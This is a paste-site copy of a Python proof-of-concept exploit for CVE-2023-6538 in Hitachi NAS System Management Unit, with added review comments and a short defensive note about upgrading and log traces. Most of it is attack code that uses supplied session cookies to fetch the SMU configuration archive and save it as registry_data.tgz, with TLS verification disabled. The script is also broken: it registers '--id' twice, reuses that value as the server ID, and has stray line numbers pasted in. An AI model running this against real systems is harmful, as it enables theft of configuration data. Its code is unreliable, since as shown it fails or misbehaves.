FlyFar

HNAS SMU 14.8.7825 - Information Disclosure - CVE-2023-6538

Mar 21st, 2024
# Exploit Title: Hitachi NAS (HNAS) System Management Unit (SMU) 14.8.7825 - Information Disclosure
# CVE:              CVE-2023-6538
# Date:             2023-12-13
# Exploit Author:   Arslan Masood (@arszilla)
# Vendor:           https://www.hitachivantara.com/
# Version:          < 14.8.7825.01
# Tested On:        13.9.7021.04

import argparse
from os import getcwd

import requests

# Command-line interface for the CVE-2023-6538 proof of concept.
# Every option is required. Two of them carry cookie values (JSESSIONID and
# JSESSIONIDSSO), presumably taken from an already authenticated SMU session.
parser = argparse.ArgumentParser(
    description="CVE-2023-6538 PoC",
    usage="./CVE-2023-6538.py --host <Hostname/FQDN/IP> --id <JSESSIONID> --sso <JSESSIONIDSSO>"
    )

# --host: hostname, FQDN or IP address of the SMU, optionally with ":port".
parser.add_argument(
    "--host",
    required=True,
    type=str,
    help="Hostname/FQDN/IP Address. Provide the port, if necessary, i.e. 127.0.0.1:8443, example.com:8443"
    )

# --id (first registration): value sent as the JSESSIONID cookie.
parser.add_argument(
    "--id",
    required=True,
    type=str,
    help="JSESSIONID cookie value"
    )

# --sso: value sent as the JSESSIONIDSSO cookie.
parser.add_argument(
    "--sso",
    required=True,
    type=str,
    help="JSESSIONIDSSO cookie value"
    )

# NOTE(review): "--id" is registered a second time here, with help text that
# describes a server ID rather than a cookie. argparse's default conflict
# handling raises an error on a repeated option string, and the usage line
# above documents no separate server-ID option.
parser.add_argument(
    "--id",
    required=True,
    type=str,
    help="Server ID value"
    )

# Parsed at import time, so the module-level `args` exists before
# download_file is defined.
args = parser.parse_args()

  52.  
def download_file(hostname: str, jsessionid: str, jsessionidsso: str, serverid: str) -> None:
    """Request the SMU configuration-download page and save the response body.

    Sends a single GET to
    ``/mgr/app/template/simple%2CDownloadConfigScreen.vm`` on *hostname*,
    carrying the two supplied session cookies, and writes whatever body is
    returned to ``registry_data.tgz`` in the current working directory.

    Defensive context: the file header lists versions below 14.8.7825.01 as
    affected by CVE-2023-6538, so upgrading to that release or later is
    presumably the remediation (confirm against the vendor advisory). A
    request for this path with a ``serverid`` query parameter is the artefact
    this script would leave in the SMU's web access logs.

    Args:
        hostname: Host (optionally ``host:port``) placed in the URL and Referer.
        jsessionid: Value sent as the ``JSESSIONID`` cookie.
        jsessionidsso: Value sent as the ``JSESSIONIDSSO`` cookie.
        serverid: Value placed in the ``serverid`` query parameter.
    """
    # Fixed output name; an existing file of that name in the CWD is overwritten
    # because it is opened with mode 'wb' below.
    filename = "registry_data.tgz"

    # Vulnerable SMU URL (hostname and serverid are interpolated unescaped):
    smu_url = f"https://{hostname}/mgr/app/template/simple%2CDownloadConfigScreen.vm?serverid={serverid}"

    # GET request cookies: the request is made under the supplied session.
    smu_cookies = {
        "JSESSIONID":       jsessionid,
        "JSESSIONIDSSO":    jsessionidsso
        }

    # GET request headers: a fixed browser-like header set. The Referer names
    # the serveradmin.ConfigRestoreAction page on the same host.
    smu_headers = {
        "User-Agent":                   "Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0",
        "Accept":                       "text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8",
        "Accept-Language":              "en-US,en;q=0.5",
        "Accept-Encoding":              "gzip, deflate",
        "Dnt":                          "1",
        "Referer":                      f"https://{hostname}/mgr/app/action/serveradmin.ConfigRestoreAction/eventsubmit_doperform/ignored",
        "Upgrade-Insecure-Requests":    "1",
        "Sec-Fetch-Dest":               "document",
        "Sec-Fetch-Mode":               "navigate",
        "Sec-Fetch-Site":               "same-origin",
        "Sec-Fetch-User":               "?1",
        "Te":                           "trailers",
        "Connection":                   "close"
        }

    # Send the request.
    # NOTE(review): verify=False disables TLS certificate validation, so the
    # session cookies are sent to whichever endpoint answers for `hostname`.
    # stream=True has no practical effect, because `.content` below reads the
    # whole body into memory.
    with requests.get(smu_url, headers=smu_headers, cookies=smu_cookies, stream=True, verify=False) as file_download:
        with open(filename, 'wb') as backup_archive:
            # Write the response body to the CWD. Neither the status code nor
            # the content type is checked, so an error or login page would be
            # saved under the .tgz name as well.
            backup_archive.write(file_download.content)

    # Printed unconditionally once the write completes.
    print(f"{filename} has been downloaded to {getcwd()}")

  90.  
if __name__ == "__main__":
    # NOTE(review): args.id is passed twice, as both the JSESSIONID cookie
    # value and the serverid query parameter.
    download_file(args.host, args.id, args.sso, args.id)
